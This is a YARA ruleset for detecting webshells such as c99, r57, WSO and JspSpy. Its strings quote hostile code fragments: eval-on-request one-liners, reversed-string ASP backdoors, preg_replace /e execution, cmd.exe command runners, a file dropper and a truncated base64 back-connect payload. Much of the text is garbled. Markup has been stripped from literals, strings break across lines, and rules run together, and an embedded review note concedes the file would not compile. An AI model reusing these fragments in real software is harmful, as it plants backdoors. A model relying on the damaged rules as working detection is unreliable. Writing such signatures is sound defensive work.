cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword condition: all of them } rule Php_Webshell_webshell_php_dodo_zip { strings: $s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x" $s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" condition: all of them } rule Php_Webshell_webshell_aZRaiLPhp_v1_0 { strings: $s5 = "echo \" CHMODU \".substr(base_convert(@fileperms($" $s7 = "echo \"\" . $filena" $s9 = "// by: The Dark Raver" fullword condition: 1 of them } rule Php_Webshell_webshell_ironshell { strings: $s4 = "print \"<%@page import=\"java.net.*\"%><%String t=request." condition: all of them } rule Php_Webshell_webshell_mysqlwebsh { strings: $s3 = " \" title=\"<%=SubFolder.Name%>\"> ??????????????????: " fullword condition: all of them } rule Asp_Webshell_webshell_asp_1 { strings: $s4 = "!22222222222222222222222222222222222222222222222222" fullword $s8 = "<%eval request(\"pass\")%>" fullword condition: all of them } rule Asp_Webshell_webshell_ASP_tool { strings: $s0 = "Response.Write \"<DIR> " fullword condition: 2 of them } rule Jsp_Webshell_webshell_jsp_jshell { strings: $s0 = "kXpeW[\"" fullword $s4 = "[7b:g0W@W<" fullword $s5 = "b:gHr,g<" fullword $s8 = "RhV0W@W<" fullword $s9 = "S_MR(u7b" fullword condition: all of them } rule Asp_Webshell_webshell_ASP_zehir4 { strings: $s9 = "Response.Write \"" fullword condition: all of them } rule Php_Webshell_webshell_PHP_Shell_x3 { strings: $s4 = "  [" $s6 = "echo \"
    \");" fullword condition: all of them } rule Jsp_Webshell_webshell_jsp_k81 { strings: $s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword $s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword condition: 1 of them } rule Asp_Webshell_webshell_ASP_zehir { strings: $s9 = "Response.Write \"
    " condition: all of them } rule Php_Webshell_webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit { strings: $s1 = "" fullword condition: all of them } rule Php_Webshell_webshell_redirect { strings: $s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" " condition: all of them } rule Jsp_Webshell_webshell_jsp_cmdjsp { strings: $s5 = "" fullword condition: all of them } rule Php_Webshell_webshell_Java_Shell { strings: $s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword $s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword condition: 1 of them } rule Asp_Webshell_webshell_asp_1d { strings: $s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO" condition: all of them } rule Jsp_Webshell_webshell_jsp_IXRbE { strings: $s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application" condition: all of them } rule Php_Webshell_webshell_PHP_G5 { strings: $s3 = "echo \"Hacking Mode?
     Server's PHP Version:&n" $s4 = "  [" $s7 = "echo \"" $s3 = "" fullword $s2 = "out.print(\")
    Filenam" $s8 = "print \"File: Tools\">" fullword $s4 = "Response.Write(\"

    FILE: \" & file & \"

    \")" fullword condition: all of them } rule Php_Webshell_webshell_PHP_co { strings: $s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword $s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword condition: all of them } rule Php_Webshell_webshell_PHP_150 { strings: $s0 = "HJ3HjqxclkZfp" $s1 = "" fullword condition: all of them } rule Php_Webshell_webshell_PHP_c37 { strings: $s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj')," $s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE]," condition: all of them } rule Php_Webshell_webshell_PHP_b37 { strings: $s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc" condition: all of them } rule Php_Webshell_webshell_php_backdoor { strings: $s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword $s2 = "
    \" METHOD=GET >execute command:  " fullword
    condition:
    	all of them
    }
    rule Asp_Webshell_webshell_asp_cmdasp
    {
        meta:
            description = "ASP command shell (cmdasp): banner that echoes host\\user via oScriptNet plus a cmd.exe /c call whose output is redirected into a temp file"
            note = "Both indicators are also carried by Asp_Webshell_webshell_asp_cmd, which fires on any one of them; this rule is the stricter both-required variant, so every hit here is also a hit there"
        strings:
            // Literal page text: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
            $banner = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" ascii fullword
            // WScript.Shell execution of the submitted command, stdout captured in szTempFile
            $exec = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" ascii fullword
        condition:
            $banner and $exec
    }
    rule Jsp_Webshell_webshell_spjspshell
    {
        meta:
            description = "JSP shell (spjspshell): usage hint text giving a Unix '/bin/sh -c tar' example and a Windows 'cmd.exe /c type' example"
            note = "Single help-text indicator with no structural check; an operator who edits the hint evades the rule, and any document quoting it will match"
        strings:
            // Help text shown by the shell; backslashes are escaped for YARA
            $usage_hint = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:" ascii
        condition:
            $usage_hint
    }
    rule Jsp_Webshell_webshell_jsp_action
    {
        meta:
            description = "JSP webshell variant: hard-coded Oracle thin JDBC URL for localhost:1521/orcl together with a gb2312 page directive"
            note = "Low confidence on its own - both literals are ordinary in a Chinese-language JSP application that talks to a local Oracle instance; treat a hit as a triage lead and review the file rather than an indicator of compromise by itself"
        strings:
            // Connection string as written in the shell source
            $jdbc_url = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" ascii fullword
            // Page directive; only narrows the hit to gb2312-encoded JSP
            $page_directive = "<%@ page contentType=\"text/html;charset=gb2312\"%>" ascii fullword
        condition:
            $jdbc_url and $page_directive
    }
    rule Php_Webshell_webshell_Inderxer
    {
        meta:
            description = "Inderxer shell: Turkish 'Nereye :' form label next to a JSP 'path' parameter re-decoded from ISO-8859-1"
            note = "Despite the Php_ prefix the indicators are JSP (request.getParameter). The $path_param literal is a prefix of a string used by Php_Webshell_webshell_PHPRemoteView, so the two rules can fire on the same file"
        strings:
            // Form label; trailing spaces are part of the indicator, keep them
            $label = "Nereye :   " ascii fullword
            // Path parameter re-decoding; the line is truncated here, so no fullword
            $path_param = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859" ascii
        condition:
            $label and $path_param
    }
    rule Php_Webshell_webshell_ELMALISEKER_Backd00r
    {
        meta:
            description = "ELMALISEKER ASP backdoor: a response.write call and a form field named url"
            note = "Both literals appear truncated exactly where HTML markup would begin, which suggests tags were dropped during extraction. As written, 'response.write(' plus 'name=url' will match many benign ASP pages - confirm the full strings against the upstream rule before deploying this one"
        strings:
            // Generic ASP output call; fullword only guards the characters around the match
            $write_call = "response.write(\"" ascii fullword
            // Attribute fragment of an input element whose name starts with url
            $url_field = "\" name=\"url" ascii
        condition:
            $write_call and $url_field
    }
    rule Jsp_Webshell_webshell_jsp_inback3
    {
        meta:
            description = "One-line JSP dropper: when parameter f is present, opens a java.io.FileOutputStream whose path starts from the servlet 'application' object (the remainder of the line is truncated in this indicator)"
            note = "Identical indicator and condition to Jsp_Webshell_webshell_jsp_IXRbE earlier in this file; the two rules always fire together"
        strings:
            // Start of the dropper one-liner as it appears in the shell source
            $dropper = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application" ascii
        condition:
            $dropper
    }
    rule Php_Webshell_webshell_metaslsoft
    {
    strings:
    	$s7 = "$buff .= \"[ $folder ]LINKOperating System : \".php_uname().\" \",in('text','mk_name"
    	$s3 = "echo sr(15,\"\".$lang[$language.'_text21'].$arrow.\"\",in('checkbox','nf1"
    	$s9 = "echo sr(40,\"\".$lang[$language.'_text26'].$arrow.\"\",\"Current File (import new file name and new file)
    Current file (fullpath)
      \".$pathname." condition: all of them } rule Php_Webshell_webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx { strings: $s8 = "else {echo \"Running datapipe... ok! Connect to \".getenv(\"SERVER_ADDR\"" condition: all of them } rule Php_Webshell_webshell_2008_2009lite_2009mssql { strings: $s0 = "
    Path.'/\\');" $s7 = "p('

    File Manager - Current disk free '.sizecount($free).' of '.sizecount($all" condition: all of them } rule Php_Webshell_webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz { strings: $s0 = "$mainpath_info = explode('/', $mainpath);" fullword $s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d" condition: all of them } rule Jsp_Webshell_webshell_807_dm_JspSpyJDK5_m_cofigrue { strings: $s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword $s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(), \"GBK\");" fullword condition: 1 of them } rule Php_Webshell_webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx { strings: $s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals" $s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword condition: all of them } rule Php_Webshell_webshell_404_data_in_JFolder_jfolder01_xxx { strings: $s4 = " " condition: 2 of them } rule Php_Webshell_webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz { strings: $s0 = "$this -> addFile($content, $filename);" fullword $s3 = "function addFile($data, $name, $time = 0) {" fullword $s8 = "function unix2DosTime($unixtime = 0) {" fullword $s9 = "foreach($filelist as $filename){" fullword condition: all of them } rule Php_Webshell_webshell_c99_c66_c99_shadows_mod_c99shell { strings: $s2 = " if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv" $s3 = " \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword $s4 = "
    array(\"Using PERL\",\"perl %path %localport %remotehos" $s9 = " elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!" condition: 2 of them } rule Jsp_Webshell_webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 { strings: $s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"\"+" fullword $s4 = "out.println(\"

    File Manager - Current disk "\"+(cr.indexOf(\"/\") == 0?" $s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword $s8 = "\"

    " condition: 2 of them } rule Jsp_Webshell_webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend { strings: $s0 = "return new Double(format.format(value)).doubleValue();" fullword $s5 = "File tempF = new File(savePath);" fullword $s9 = "if (tempF.isDirectory()) {" fullword condition: 2 of them } rule Php_Webshell_webshell_c99_c99shell_c99_c99shell { strings: $s2 = "$bindport_pass = \"c99\";" fullword $s5 = " else {echo \"Execution PHP-code\"; if (empty($eval_txt)) {$eval_txt = tr" condition: 1 of them } rule Php_Webshell_webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat { strings: $s6 = "$res = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d" $s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword $s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword $s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword condition: 2 of them } rule Php_Webshell_webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx { strings: $s3 = "BODY, TD, TR {" fullword $s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword $s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword condition: 2 of them } rule Php_Webshell_webshell_000_403_807_a_c5_config_css_dm_he1p_xxx { strings: $s3 = "String savePath = request.getParameter(\"savepath\");" fullword $s4 = "URL downUrl = new URL(downFileUrl);" fullword $s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword $s6 = "String downFileUrl = request.getParameter(\"url\");" fullword $s7 = "FileInputStream fInput = new FileInputStream(f);" fullword $s8 = "URLConnection conn = downUrl.openConnection();" fullword $s9 = "sis = request.getInputStream();" fullword condition: 4 of them } rule Php_Webshell_webshell_2_520_icesword_job_ma1 { strings: $s1 = "" fullword $s3 = "" fullword $s8 = "" fullword condition: 2 of them } rule Jsp_Webshell_webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn { strings: $s0 = "
    \"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"
    " fullword condition: all of them } rule Php_Webshell_webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY { strings: $s4 = "http://www.4ngel.net" fullword $s5 = " | PHP" fullword $s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword $s9 = "Codz by Angel" fullword condition: 2 of them } rule Php_Webshell_webshell_c99_locus7s_c99_w4cking_xxx { strings: $s1 = "$res = @shell_exec($cfe);" fullword $s8 = "$res = @ob_get_contents();" fullword $s9 = "@exec($cfe,$res);" fullword condition: 2 of them } rule Php_Webshell_webshell_browser_201_3_ma_ma2_download { strings: $s1 = "private static final int EDITFIELD_ROWS = 30;" fullword $s2 = "private static String tempdir = \".\";" fullword $s6 = "\"" condition: 2 of them } rule Jsp_Webshell_webshell_000_403_c5_queryDong_spyjsp2010 { strings: $s2 = "\" www.Expdoor.com" fullword $s5 = " second(s) {gzip} usage:" $s17 = "<%if(request.getParameter(\"f\")" condition: all of them } rule Php_Webshell_webshell_webshells_new_xxxx { strings: $s0 = " " fullword condition: all of them } rule Jsp_Webshell_webshell_webshells_new_JJjsp3 { strings: $s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S" condition: all of them } rule Php_Webshell_webshell_webshells_new_PHP1 { strings: $s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword $s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword $s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword condition: 1 of them } rule Jsp_Webshell_webshell_webshells_new_JJJsp2 { strings: $s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z" $s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ" $s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()" $s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase(" condition: 1 of them } rule 
Php_Webshell_webshell_webshells_new_radhat { strings: $s1 = "sod=Array(\"D\",\"7\",\"S" condition: all of them } rule Asp_Webshell_webshell_webshells_new_asp1 { strings: $s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword $s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword condition: 1 of them } rule Php_Webshell_webshell_webshells_new_php6 { strings: $s1 = "array_map(\"asx73ert\",(ar" $s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword $s4 = "shell.php?qid=zxexp " fullword condition: 1 of them } rule Php_Webshell_webshell_webshells_new_xxx { strings: $s3 = "" fullword condition: all of them } rule Php_Webshell_webshell_GetPostpHp { strings: $s0 = "" fullword condition: all of them } rule Php_Webshell_webshell_webshells_new_php5 { strings: $s0 = "Error!\";" fullword $s2 = "DBHACKLERIN&klas=<%=aktifklas%>" $s3 = "www.aventgrup.net" $s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT" condition: 1 of them } rule Php_Webshell_r57shell_php_php { strings: $s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx " $s2 = "RusH security team" $s3 = "'ru_text12' => 'back-connect" $s4 = "r57shell" condition: 1 of them } rule Php_Webshell_rst_sql_php_php { strings: $s0 = "C:\\tmp\\dump_" $s1 = "RST MySQL" $s2 = "http://rst.void.ru" $s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';" condition: 2 of them } rule Php_Webshell_wh_bindshell_py { strings: $s0 = "#Use: python wh_bindshell.py [port] [password]" $s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword $s3 = "#bugz: ctrl+c etc =script stoped=" fullword condition: 1 of them } rule Php_Webshell_lurm_safemod_on_cgi { strings: $s0 = "Network security team :: CGI Shell" fullword $s1 = "#########################<>#####################################" fullword $s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" 
fullword condition: 1 of them } rule Php_Webshell_c99madshell_v2_0_php_php { strings: $s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef" condition: all of them } rule Php_Webshell_backupsql_php_often_with_c99shell { strings: $s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ." $s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog" condition: all of them } rule Php_Webshell_uploader_php_php { strings: $s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword $s3 = "Send this file: " fullword $s4 = "" fullword condition: 2 of them } rule Php_Webshell_telnet_pl { strings: $s0 = "W A R N I N G: Private Server" $s2 = "$Message = q$
     _____  _____  _____          _____   "
    condition:
    	all of them
    }
    rule Php_Webshell_w3d_php_php
    {
        // "W3D Shell" (PHP web shell credited to Warpboy). The three
        // markers are the banner, the author credit and one of the shell's
        // own error messages; any two must be present so that a single
        // generic phrase such as "No Query Executed" does not fire alone.
        strings:
            $banner  = "W3D Shell"
            $author  = "By: Warpboy"
            $err_msg = "No Query Executed"
        condition:
            2 of ($banner, $author, $err_msg)
    }
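    /*
     * Review note on this group of rules.
     *
     * The copy of this ruleset on this page lost the HTML markup that was
     * inside several YARA string literals: where a tag used to be there is
     * now a raw line break (or nothing at all) between the quotes.  A YARA
     * text string cannot span lines, and libyara rejects the whole source
     * file on the first malformed rule, so as extracted not one rule in
     * this file would load.  Rules whose pattern cannot be recovered from
     * this copy are kept below verbatim but commented out; restore them
     * from the upstream ruleset before re-enabling them.  Every other rule
     * keeps its name, strings, modifiers and condition unchanged and is
     * only reformatted one string per line.
     */

    /* UNRECOVERABLE - restore from upstream.  $s2 was HTML markup and is
       now a bare line break, so the rule does not compile:
    rule Php_Webshell_WebShell_cgi
    {
    strings:
        $s0 = "WebShell.cgi"
        $s2 = "
    "
    condition:
        2 of them
    }
    */

    /* UNRECOVERABLE - restore from upstream.  $s0 was split by stripped
       markup ("... open the page in" / "Win Dir:" / "method=POST") and at
       least one further string is missing.  Note that
       Php_Webshell_DxShell_php_php below carries the intact form of the
       same "Tip: to view the file" string, so DxShell coverage is kept:
    rule Php_Webshell_Dx_php_php
    {
    strings:
        $s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in
    Win Dir:
    \" method=\"POST"
    condition:
        2 of them
    }
    */

    // Asmodeus Perl remote shell: usage line, banner and the connect()
    // error string. Two of the four markers are required.
    rule Php_Webshell_Asmodeus_v0_1_pl
    {
    strings:
        $s0 = "[url=http://www.governmentsecurity.org"
        $s1 = "perl asmodeus.pl client 6666 127.0.0.1"
        $s2 = "print \"Asmodeus Perl Remote Shell"
        $s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
    condition:
        2 of them
    }

    // backup.php helper that ships with c99shell: fake phpMyAdmin dump
    // header plus the inline db_connect()/header() call. All three must hit.
    rule Php_Webshell_backup_php_often_with_c99shell
    {
    strings:
        $s0 = "#phpMyAdmin MySQL-Dump" fullword
        $s2 = ";db_connect();header('Content-Type: application/octetstr"
        $s4 = "$data .= \"#Database: $database" fullword
    condition:
        all of them
    }

    /* UNRECOVERABLE - restore from upstream.  The extraction fused two
       rules here: Asp_Webshell_Reader_asp lost its condition and its $s3
       is cut by a line break, and the strings that follow ("[ADDITINAL
       TITTLE]-phpShell ...") belong to a second rule whose header is gone
       (the same banner string is used by Php_Webshell_PHP_Shell_v1_7
       later in this file).  The duplicate $s1/$s2 identifiers alone make
       this uncompilable:
    rule Asp_Webshell_Reader_asp
    {
    strings:
        $s1 = "Mehdi & HolyDemon"
        $s2 = "www.infilak."
        $s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%>

    " fullword
        $s1 = "[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
        $s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
    condition:
        1 of them
    }
    */

    // MyShell PHP shell: chdir error text, file editor heading and the
    // file-info line. Two of three required.
    rule Php_Webshell_myshell_php_php
    {
    strings:
        $s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
        $s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
        $s2 = " $fileEditInfo = \"  :::::::  Owner: <font color=$"
    condition:
        2 of them
    }

    // SimShell 1.0 (Simorgh Security). $s2 is the "cd" command parser and
    // is the only code-level marker; the others are branding strings.
    rule Php_Webshell_SimShell_1_0___Simorgh_Security_MGZ_php
    {
    strings:
        $s0 = "Simorgh Security Magazine "
        $s1 = "Simshell.css"
        $s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
        $s3 = "www.simorgh-ev.com"
    condition:
        2 of them
    }

    // jspshall JSP shell: author handle plus two code fragments from the
    // command dispatcher and file lister.
    rule Jsp_Webshell_jspshall_jsp
    {
    strings:
        $s0 = "kj021320"
        $s1 = "case 'T':systemTools(out);break;"
        $s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
    condition:
        2 of them
    }

    // Generic "PHP Web Shell": $s3 alone is too common a phrase, which is
    // why the rule requires the distinctive die() message as well.
    rule Php_Webshell_webshell_php
    {
    strings:
        $s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
        $s3 = "PHP Web Shell"
    condition:
        all of them
    }

    // rootshell.php (shells.dl.am). The fourth string of the original rule
    // was cut by stripped markup and cannot be reproduced from this copy,
    // so it is kept as a comment; "2 of them" now ranges over the three
    // strings that survived, which is slightly narrower than upstream.
    rule Php_Webshell_rootshell_php
    {
    strings:
        $s0 = "shells.dl.am"
        $s1 = "This server has been infected by $owner"
        $s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
        // $s4 = "Could not write to file! ... (Maybe you didn't enter any text?)"
        //       -- damaged in this extraction, restore from upstream
    condition:
        2 of them
    }

    // ConnectBack perl backdoor. Any one marker fires; note that $s1 is a
    // superstring of $s2 in Php_Webshell_PHP_Backdoor_Connect_pl_php
    // below, so both rules will alert on this family.
    rule Php_Webshell_connectback2_pl
    {
    strings:
        $s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL "
        $s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
        $s2 = "ConnectBack Backdoor"
    condition:
        1 of them
    }

    // DefaceKeeper 0.2: form markup, the nested base64 eval() loader and
    // the hosted logo image. Any one is enough.
    rule Php_Webshell_DefaceKeeper_0_2_php
    {
    strings:
        $s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
        $s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
        $s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
    condition:
        1 of them
    }

    // WSO shell: base64-encoded perl back-connect payload and the
    // "Execution PHP-code" form.
    rule Php_Webshell_shells_PHP_wso
    {
    strings:
        $s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
        $s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
    condition:
        1 of them
    }

    // French "backdoor1" PHP shell (class backdoor, "Copier un fichier").
    rule Php_Webshell_backdoor1_php
    {
    strings:
        $s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
        $s2 = "class backdoor {"
        $s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
    condition:
        1 of them
    }

    // elmaliseker ASP shell. $s3 is a bare URL and will also hit on
    // documents that merely reference vnhacker.org; triage accordingly.
    rule Asp_Webshell_elmaliseker_asp
    {
    strings:
        $s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
        $s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
        $s2 = "dim zombie_array,special_array"
        $s3 = "http://vnhacker.org"
    condition:
        1 of them
    }

    // indexer.asp (Turkish defacement tool): form field and a fragment of
    // the script-encoded body.
    rule Asp_Webshell_indexer_asp
    {
    strings:
        $s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
        $s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
    condition:
        1 of them
    }

    // DxShell: the intact "Tip: to view the file" hint and the
    // "POST (php eval)" row of its UI.
    rule Php_Webshell_DxShell_php_php
    {
    strings:
        $s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
        $s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
    condition:
        1 of them
    }

    // s72 Shell (Turkish): UI markup, version banner and an upload message.
    rule Php_Webshell_s72_Shell_v1_1_Coding_html
    {
    strings:
        $s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
        $s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
        $s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\""
    condition:
        1 of them
    }

    // hidshell: matches the opening of its fixed encoded payload blob.
    rule Php_Webshell_hidshell_php_php
    {
    strings:
        $s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
    condition:
        all of them
    }

    // Kacak FSO 1.0 ASP shell. $s4 is a plain e-mail address and will also
    // hit on text that merely quotes it.
    rule Asp_Webshell_kacak_asp
    {
    strings:
        $s0 = "Kacak FSO 1.0"
        $s1 = "if request.querystring(\"TGH\") = \"1\" then"
        $s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
        $s4 = "mailto:BuqX@hotmail.com"
    condition:
        1 of them
    }

    // Perl back-connect shell ("LorD-C0d3r-NT"). $s2 is shared with the
    // connectback2 family above, so expect overlapping alerts.
    rule Php_Webshell_PHP_Backdoor_Connect_pl_php
    {
    strings:
        $s0 = "LorD of IRAN HACKERS SABOTAGE"
        $s1 = "LorD-C0d3r-NT"
        $s2 = "echo --==Userinfo==-- ;"
    condition:
        1 of them
    }

    // Antichat SOCKS5 server in PHP: request-parsing line, a comment from
    // the source, and the project domain.
    rule Php_Webshell_Antichat_Socks5_Server_php_php
    {
    strings:
        $s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
        $s3 = "# [+] Domain name address type"
        $s4 = "www.antichat.ru"
    condition:
        1 of them
    }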
rule Php_Webshell_Antichat_Shell_v1_3_php { strings: $s0 = "Antichat" $s1 = "Can't open file, permission denide" $s2 = "$ra44" condition: 2 of them } rule Php_Webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php { strings: $s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy" $s1 = "Mode Shell v1.0</font></span>" $s2 = "has been already loaded. PHP Emperor <xb5@hotmail." condition: 1 of them } rule Php_Webshell_mysql_php_php { strings: $s0 = "action=mysqlread&mass=loadmass\">load all defaults" $s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru" $s3 = "$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = " condition: 1 of them } rule Php_Webshell_Worse_Linux_Shell_php { strings: $s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td" $s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd" condition: 1 of them } rule Php_Webshell_cyberlords_sql_php_php { strings: $s0 = "Coded by n0 [nZer0]" $s1 = " www.cyberlords.net" $s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE" $s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);" condition: 1 of them } rule Asp_Webshell_cmd_asp_5_1_asp { strings: $s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword $s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword 